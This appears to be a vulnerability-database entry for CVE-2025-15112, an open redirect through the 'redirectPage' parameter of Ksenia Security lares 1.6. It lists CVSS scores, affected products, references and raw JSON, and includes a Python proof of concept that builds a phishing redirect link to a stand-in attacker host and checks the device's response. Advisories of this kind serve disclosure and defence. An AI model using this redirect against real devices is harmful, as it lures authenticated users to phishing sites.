Security Vulnerability Report
CVE-2025-15112 CVSS 5.4 MEDIUM

Published: 2025-12-30 23:15:50
Last Modified: 2026-03-11 20:16:13

Description

Ksenia Security lares (legacy model) version 1.6 contains a URL redirection vulnerability in the 'cmdOk.xml' script that allows attackers to manipulate the 'redirectPage' GET parameter. Attackers can craft malicious links that redirect authenticated users to arbitrary websites when clicking on a specially constructed link hosted on a trusted domain.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:* - NOT VULNERABLE
Ksenia Security lares (legacy model) < 1.6
Ksenia Security lares (legacy model) = 1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-15112 PoC - URL Redirection in Ksenia Security lares
# Target: Ksenia Security lares (legacy model) version 1.6
# Vulnerability: Open redirect via redirectPage parameter in cmdOk.xml

target_url = "http://target-ksenia-device/cmdOk.xml"
malicious_url = "http://attacker-controlled-site.com/phishing"

# Construct malicious redirect URL
params = {"redirectPage": malicious_url}

# Generate the malicious link that can be sent to authenticated users
malicious_link = f"{target_url}?redirectPage={malicious_url}"
print(f"Malicious redirect link: {malicious_link}")

# Verify the redirect behavior (for authorized testing only)
response = requests.get(target_url, params=params, allow_redirects=False, timeout=10)

if response.status_code in [301, 302, 303, 307, 308]:
    # Default to an empty string so a redirect without a Location header does not raise
    location = response.headers.get("Location", "")
    print(f"Redirect detected to: {location}")
    if malicious_url in location:
        print("[+] Vulnerability confirmed: Open redirect works")
    else:
        print("[-] Redirect target differs from expected")
else:
    print(f"[-] No redirect response (status: {response.status_code})")

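References

https://packetstorm.news/files/id/190179/ (Third Party Advisory)
https://www.kseniasecurity.com/ (Product)
https://www.vulncheck.com/advisories/ksenia-security-lares-home-automation-url-redirection-vulnerability (Third Party Advisory)
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5928.php (Third Party Advisory)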

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15112", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:49.733", "lastModified": "2026-03-11T20:16:13.177", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Ksenia Security lares (legacy model) version 1.6 contains a URL redirection vulnerability in the 'cmdOk.xml' script that allows attackers to manipulate the 'redirectPage' GET parameter. Attackers can craft malicious links that redirect authenticated users to arbitrary websites when clicking on a specially constructed link hosted on a trusted domain."}, {"lang": "es", "value": "Ksenia Security Lares 4.0 versión 1.6 contiene una vulnerabilidad de redirección de URL en el script 'cmdOk.xml' que permite a los atacantes manipular el parámetro GET 'redirectPage'. Los atacantes pueden crear enlaces maliciosos que redirigen a usuarios autenticados a sitios web arbitrarios al hacer clic en un enlace especialmente construido alojado en un dominio de confianza."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "DF94F084-2F13-427A-9CB5-9E3E95621C8B"}]}, {"operator": 
"OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DDE71F37-880F-4534-80FF-A2BE3D8E2AD4"}]}]}], "references": [{"url": "https://packetstorm.news/files/id/190179/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.kseniasecurity.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ksenia-security-lares-home-automation-url-redirection-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5928.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5928.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}